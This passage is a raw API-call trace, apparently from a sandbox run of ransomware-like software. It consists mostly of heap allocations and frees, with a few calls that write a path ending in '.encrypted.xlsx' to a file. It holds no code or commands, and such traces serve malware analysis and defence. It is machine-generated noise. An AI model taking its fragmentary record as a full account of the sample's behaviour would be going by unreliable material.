hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.encrypted.xlsx\r\n", cchWideChar=91, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 91 [0031.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5b) returned 0x87a9d8 [0031.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.encrypted.xlsx\r\n", cchWideChar=91, lpMultiByteStr=0x87a9d8, cbMultiByte=91, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.encrypted.xlsx\r\n", lpUsedDefaultChar=0x0) returned 91 [0031.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0031.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0031.882] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x5a, lpOverlapped=0x0) returned 1 [0031.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0031.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.882] CloseHandle (hObject=0x128) returned 1 [0031.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.885] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.885] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.886] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.886] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.886] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.886] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cda8 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.887] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0031.889] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 